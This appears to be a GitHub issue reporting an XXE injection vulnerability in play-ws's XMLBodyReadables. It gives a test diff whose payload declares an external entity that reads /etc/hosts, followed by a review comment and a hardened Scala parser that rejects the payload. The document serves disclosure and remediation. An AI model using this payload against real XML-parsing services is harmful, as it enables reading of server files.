play-ws

XMLBodyReadables has "XML External Entity Injection" vulnerability

Open xuwei-k opened this issue 4 years ago • 0 comments

Play WS Version (2.5.x / etc)

from v2.1.0-M3 to v2.1.2

API (Scala / Java / Neither / Both)

Scala

Operating System (Ubuntu 15.10 / MacOS 10.10 / Windows 10)

unrelated

JDK (Oracle 1.8.0_72, OpenJDK 1.8.x, Azul Zing)

unrelated

Library Dependencies

unrelated

Expected Behavior

Actual Behavior

Reproducible Test Case

--- a/integration-tests/src/test/scala/play/api/libs/ws/ahc/XMLRequestSpec.scala
+++ b/integration-tests/src/test/scala/play/api/libs/ws/ahc/XMLRequestSpec.scala
@@ -65,6 +65,13 @@ class XMLRequestSpec extends Specification with Mockito with AfterAll with MustM
     ByteString.fromArray(req.getByteData).utf8String must be_==("<hello><test/></hello>")
   }
 
+  "XXE injection vulnerability" in {
+    val test = """<!DOCTYPE name [<!ENTITY hosts SYSTEM "file:///etc/hosts"> ]><foo>&hosts;</foo>"""
+    val value: Elem = XMLBodyReadables.readableAsXml.transform(new StubResponse(test.getBytes(StandardCharsets.UTF_8)))
+    println(value) // print my /etc/hosts 😇 
+    true
+  }
+
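Review bot: the added "XXE injection vulnerability" example ends in `true` after `println(value)`, so it passes whether or not `&hosts;` is expanded and cannot catch a regression. Assert on the outcome instead, for example that `transform` throws on the DOCTYPE or that `value.text` is empty, and drop the `println`. The `file:///etc/hosts` system identifier also ties the result to machines that have that file; pointing the entity at a temporary file the test creates with known contents would make the assertion deterministic.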

sbt "integration-tests/testOnly play.api.libs.ws.ahc.XMLRequestSpec"

note

  • 6 years ago https://github.com/playframework/playframework/commit/dc94b943ee5dc
  • regression 😢 ? https://github.com/playframework/play-ws/commit/46d7a1f9ec32b81db77b494b7a57c9e9b610fa5d https://github.com/playframework/play-ws/pull/329

xuwei-k, Apr 06 '20 05:04
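One way to parse a response body so that the payload from the test case above is rejected, as an added example that is not play-ws code or the project's fix. It assumes scala-xml on the classpath and the JDK's built-in SAX parser; `HardenedXml` and `HardenedXmlDemo` are hypothetical names.

```scala
import java.io.ByteArrayInputStream
import java.nio.charset.StandardCharsets
import javax.xml.XMLConstants
import javax.xml.parsers.SAXParserFactory
import org.xml.sax.SAXParseException
import scala.util.{Failure, Success, Try}
import scala.xml.{Elem, XML}

// Hypothetical helper, not part of play-ws.
object HardenedXml {
  private val factory: SAXParserFactory = {
    val f = SAXParserFactory.newInstance()
    // Reject any document carrying a DOCTYPE, so no entity can be declared at all.
    f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
    // Defence in depth should DOCTYPEs ever be re-enabled.
    f.setFeature("http://xml.org/sax/features/external-general-entities", false)
    f.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
    f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)
    f.setXIncludeAware(false)
    f
  }

  // SAXParser instances are not thread-safe, so create one per document.
  def parse(body: Array[Byte]): Try[Elem] =
    Try(XML.withSAXParser(factory.newSAXParser()).load(new ByteArrayInputStream(body)))
}

object HardenedXmlDemo extends App {
  private def bytes(s: String): Array[Byte] = s.getBytes(StandardCharsets.UTF_8)

  // Ordinary body (the one used by the neighbouring spec): must still parse.
  HardenedXml.parse(bytes("<hello><test/></hello>")) match {
    case Success(elem) => println(s"parsed: $elem")
    case Failure(e)    => sys.error(s"benign document rejected: $e")
  }

  // Payload from the reproducible test case: must fail before any file is read.
  val xxe =
    """<!DOCTYPE name [<!ENTITY hosts SYSTEM "file:///etc/hosts"> ]><foo>&hosts;</foo>"""
  HardenedXml.parse(bytes(xxe)) match {
    case Failure(e: SAXParseException) => println(s"rejected: ${e.getMessage}")
    case other                         => sys.error(s"expected rejection, got $other")
  }
}
```

Returning `Try[Elem]` lets the caller decide how a rejected body is surfaced; a regression test can assert on the `Failure` instead of printing the parsed element.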